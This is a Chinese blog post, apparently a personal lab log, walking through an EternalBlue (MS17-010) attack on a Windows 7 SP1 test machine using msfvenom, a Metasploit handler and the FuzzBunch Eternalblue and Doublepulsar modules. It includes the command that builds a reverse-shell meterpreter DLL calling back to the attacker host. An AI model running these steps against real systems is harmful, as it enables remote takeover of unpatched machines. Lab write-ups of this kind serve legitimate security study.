(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

  • A+
所属分类:网络安全

出了好几天了,一直没看,虽然网络上已经有很多类似文章不过我还是在这里记录一下测试的过程,当然还是内网测试,且在没有防护下进行

kali linux :ip 192.168.0.107

目标机windows 7 sp1:ip 192.168.0.105

攻击03:ip 192.168.0.106

微软公告:Microsoft Security Bulletin MS17-010 - Critical

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位因为需要配合msf所以先生成一下DLL吧!

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT 4444 -f dll > testexp.dll

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

接着先打开msf,进行配置

msfconsole

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

使用hanlder模块

use exploit/multi/hanlder

在设置payload

set payload windows/x64/meterpreter/reverse_tcp

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

好,我们在看看需要设置的

show options

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

端口默认就是4444不用设置,只需要在设置一下host

set LHOST 192.168.0.107

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

ok,现在把生成好的dll拷贝回我们的03攻击机上!

现在进入windows目录,执行fb.py

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

第一步就是需要设置攻击目标的ip和03攻击机的ip了,这里我们不使用这个输入no

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

由于我们没有D盘,这里只能改一下设置了一个c盘的log(目录可以自动创建)

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

这里只有一个选择就是创建项目,默认回车即可,然后输入任意名称

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

接着使用ETERNALBLUE这个模块

use Eternalblue

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

这里需要注意下:

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

接下来就是使用msf生成的DLL了,使用Doublepulsar模块

use Doublepulsar

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

一路回车,到这里还是需要注意一下选择

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

选择2(因为我们要用DLL嘛),并且设置DLL存放的目录

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

kali上执行exploit

exploit

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

回到03下在一路回车,最后输入yes执行攻击

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

最后攻击成功

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位至于修复方法,我们可以360打个补丁就可以了!

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

最后说明一下:被攻击的目标可能会重启,或者蓝屏等问题!

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: